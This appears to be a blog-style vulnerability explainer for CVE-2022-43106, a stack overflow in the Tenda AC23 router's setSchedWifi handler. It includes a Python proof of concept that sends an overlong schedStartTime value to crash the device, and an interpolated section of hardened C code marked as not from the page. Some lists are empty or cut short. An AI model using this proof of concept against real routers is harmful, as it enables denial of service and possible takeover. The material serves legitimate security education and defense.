In 2022, security researchers discovered a serious vulnerability in the Tenda AC23 router's firmware version V16.03.07.45_cn. Tracked as CVE-2022-43106, this bug is a stack overflow issue in the setSchedWifi function. By sending a specifically crafted request to the schedStartTime parameter, an attacker can cause a stack-based buffer overflow that leads to remote code execution or denial of service (DoS).

In this post, we will explain this vulnerability from the ground up, show you simplified proof-of-concept code, and link to further resources. Our goal is to make this topic understandable, even if you’re not a professional penetration tester or software engineer.

What is a Stack Overflow?

A stack overflow happens when a program writes more data to a buffer (temporary memory) on the stack than what is actually allocated. This can overwrite important parts of the memory, such as function return addresses, leading to unexpected behavior or code execution.

When user-controllable input is not properly checked, attackers can exploit this to gain control over the system.

Where’s the Problem?

Research has revealed that the Tenda AC23 router exposes a management web interface, where users can schedule WiFi on/off times. The setSchedWifi handler function is responsible for this scheduling and accepts several HTTP POST parameters, including schedStartTime.

The router doesn't validate the length of schedStartTime.

- If a value longer than the buffer can hold is supplied, the program writes past the buffer, causing a stack overflow.
- This overflow can overwrite important information and may allow an attacker to run arbitrary code (RCE).

Security analysis of the router firmware found code that looked like this (simplified for clarity; wp is the web server's request handle and websGetVar() looks up a POST parameter, so the snippet only compiles against the firmware's own headers):

#include <string.h>

void setSchedWifi(webs_t wp) {
    char schedStartTime_buf[8];                                   // 8-byte stack buffer
    char *schedStartTime = websGetVar(wp, "schedStartTime", "");  // attacker-controlled, any length
    strcpy(schedStartTime_buf, schedStartTime); // <- Dangerous: no length check
    // ... further code ...
}

The use of strcpy() here is insecure. If the attacker sends more than 8 bytes for schedStartTime, the schedStartTime_buf array will overflow.
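As an added example (not code from the page or from Tenda's firmware), this is what a hardened version of that copy looks like: the value is validated for length and shape before it touches the fixed-size stack buffer. It assumes schedStartTime is a clock time in "HH:MM" form, which the page does not state, and the handler set_sched_wifi_start is hypothetical, taking the parameter directly instead of going through websGetVar().

```c
#include <string.h>
#include <ctype.h>

/* Hardened replacement for the strcpy() in setSchedWifi (added example).
 * Assumption, not stated on the page: schedStartTime is a clock time in
 * "HH:MM" form, which is consistent with the 8-byte buffer. */
#define SCHED_TIME_LEN 5   /* strlen("HH:MM") */
#define SCHED_BUF_SIZE 8   /* same size as the page's schedStartTime_buf */

/* Returns 1 if s is exactly "HH:MM" with 00<=HH<=23 and 00<=MM<=59, else 0.
 * The scan is bounded, so an overlong input is rejected without walking it. */
int is_valid_sched_time(const char *s)
{
    if (s == NULL) return 0;
    const char *nul = memchr(s, '\0', SCHED_TIME_LEN + 1);
    if (nul == NULL || nul - s != SCHED_TIME_LEN) return 0;
    if (!isdigit((unsigned char)s[0]) || !isdigit((unsigned char)s[1]) ||
        s[2] != ':' ||
        !isdigit((unsigned char)s[3]) || !isdigit((unsigned char)s[4]))
        return 0;
    int hh = (s[0] - '0') * 10 + (s[1] - '0');
    int mm = (s[3] - '0') * 10 + (s[4] - '0');
    return hh <= 23 && mm <= 59;
}

/* Copies a validated time into dst. Returns 0 on success, -1 on rejection;
 * dst is always NUL-terminated and never written beyond dstlen bytes. */
int copy_sched_time(char *dst, size_t dstlen, const char *src)
{
    if (dst == NULL || dstlen == 0) return -1;
    dst[0] = '\0';
    if (!is_valid_sched_time(src) || SCHED_TIME_LEN >= dstlen) return -1;
    memcpy(dst, src, SCHED_TIME_LEN + 1);   /* includes the terminating NUL */
    return 0;
}

/* Hypothetical fixed handler: same fixed-size stack buffer as the page's
 * snippet, but the copy can no longer overflow it. The firmware's request
 * object and websGetVar() are not modelled; the parameter is passed in. */
int set_sched_wifi_start(const char *sched_start_time_param)
{
    char schedStartTime_buf[SCHED_BUF_SIZE];
    if (copy_sched_time(schedStartTime_buf, sizeof schedStartTime_buf,
                        sched_start_time_param) != 0)
        return -1;   /* answer the request with an error instead of crashing */
    /* ... the rest of the scheduling logic would use schedStartTime_buf ... */
    return 0;
}
```

An overlong or malformed value is now refused at the handler boundary, which is also the point where a request log entry for rejected input would be emitted for detection.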

Step-by-Step Exploit

1. Find the endpoint: The management web interface exposes an endpoint like /goform/setSchedWifi accepting POST requests.
2. Craft a malicious POST payload: Send an extremely long value for schedStartTime, overflowing the buffer.
3. Trigger execution: Once the overflow occurs, the attacker could crash the process (DoS) or potentially run arbitrary code by controlling the overwritten return address.

Example Python Exploit

import requests

url = 'http://<router_ip>/goform/setSchedWifi'  # Replace <router_ip> with target router's IP
payload = 'A' * 100  # 100 bytes, much larger than the 8-byte buffer

data = {
    'schedStartTime': payload,
    'otherParam': 'test'  # Add required parameters as needed
}

try:
    # A timeout is needed: a crashed httpd may never answer
    r = requests.post(url, data=data, timeout=5)
    print("Response:", r.text)
except Exception as e:
    print("Error:", e)

> Warning: This is for educational purposes only. Do NOT try this on any device that you do not own or have explicit permission to test.

Severity and Impact

Because the setSchedWifi function is accessible through the router's web admin interface, anyone on the LAN—or remotely, if the interface is exposed—could exploit this flaw. Successful exploitation could result in:

Official References

- MITRE CVE Entry for CVE-2022-43106
- Exploit Database Entry
- NVD Details
- Github Issue from original researcher

How to Protect Yourself

1. Upgrade Router Firmware: Check Tenda's official download page (Chinese) to see if a patched firmware is available.

Conclusion

CVE-2022-43106 is a classic example of an overlooked secure coding practice—improper input validation—leading to dangerous vulnerabilities. If you’re managing a Tenda AC23 router with vulnerable firmware, patch or replace it immediately. Even if you don’t own such a device, take this as a reminder: network devices like home routers are frequent targets, and keeping them updated is crucial.

Do you have questions or want to learn more? Leave a comment or visit the official CVE-2022-43106 page for detailed technical breakdowns.

Timeline

Published on: 11/03/2022 14:15:00 UTC
Last modified on: 11/03/2022 17:28:00 UTC